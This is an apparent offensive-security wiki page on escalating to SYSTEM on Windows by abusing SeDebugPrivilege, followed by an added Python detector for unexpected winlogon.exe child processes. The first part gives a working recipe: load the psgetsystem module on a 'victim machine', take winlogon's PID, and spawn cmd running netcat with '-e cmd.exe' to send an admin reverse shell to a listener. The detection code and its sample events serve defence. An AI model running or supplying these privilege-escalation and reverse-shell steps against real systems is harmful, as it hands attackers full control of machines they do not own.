SeDebugPrivilege

From RCATs
Revision as of 05:09, 21 August 2023 by Ali3nw3rx

With this privilege you can update a new process's attribute list and so elevate privileges. Use the module below to do that.

Module:
https://github.com/decoder-it/psgetsystem/blob/master/psgetsys.ps1

Get the above ps1 on the victim machine. Then run:

import-module .\psgetsys.ps1

Find the PID of a process that is privileged.

Get-Process winlogon

Use that PID to attach and execute commands.

[MyProcess]::CreateProcessFromParent("552","c:\windows\system32\cmd.exe", "/c c:\windows\temp\nc.exe 127.0.0.1 4444 -e cmd.exe")

Note:

1. Make sure to have netcat uploaded to the specified file path in the above command.
2. If you close the shell, you have to do the whole process again to get another shell.
3. Make sure you set up a nc listener to catch the admin shell.
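
On the detection side, a process created this way appears in process-creation telemetry as a child of winlogon.exe, which normally starts only a handful of binaries. The following is an added example, not part of the original page or of psgetsystem. It assumes Sysmon Event ID 1 records already parsed into dicts with the Image, ParentImage, ProcessId and CommandLine fields; the allowlist and the sample events are constructed for illustration.

```python
import ntpath  # parses Windows paths on any OS

# Assumption: a starting allowlist of children winlogon.exe normally starts;
# tune it against your own baseline.
EXPECTED_CHILDREN = {
    "winlogon.exe": {"userinit.exe", "logonui.exe", "dwm.exe",
                     "fontdrvhost.exe", "mpnotify.exe", "wlrmdr.exe"},
}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def _name(path):
    """Lower-cased file name of a Windows path ('' if missing)."""
    return ntpath.basename(path or "").lower()


def flag_unexpected_children(events):
    """Return (ProcessId, severity, reason) for each suspicious event."""
    findings = []
    for ev in events:
        parent, child = _name(ev.get("ParentImage")), _name(ev.get("Image"))
        allowed = EXPECTED_CHILDREN.get(parent)
        if allowed is None or child in allowed:
            continue  # parent not monitored, or an expected child
        severity = "high" if child in SHELLS else "review"
        findings.append((ev.get("ProcessId"), severity,
                         f"{child} started with parent {parent}"))
    return findings


# Constructed sample records, not real telemetry.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\userinit.exe",
     "ParentImage": r"C:\Windows\System32\winlogon.exe"},
    {"ProcessId": 6108, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\winlogon.exe",
     "CommandLine": r"c:\windows\system32\cmd.exe /c c:\windows\temp\nc.exe"},
    {"ProcessId": 7444, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\System32\winlogon.exe"},
    {"ProcessId": 7300, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for finding in flag_unexpected_children(SAMPLE_EVENTS):
        print(finding)
```

The same parent-to-children mapping can be extended to other system processes once their normal children are baselined.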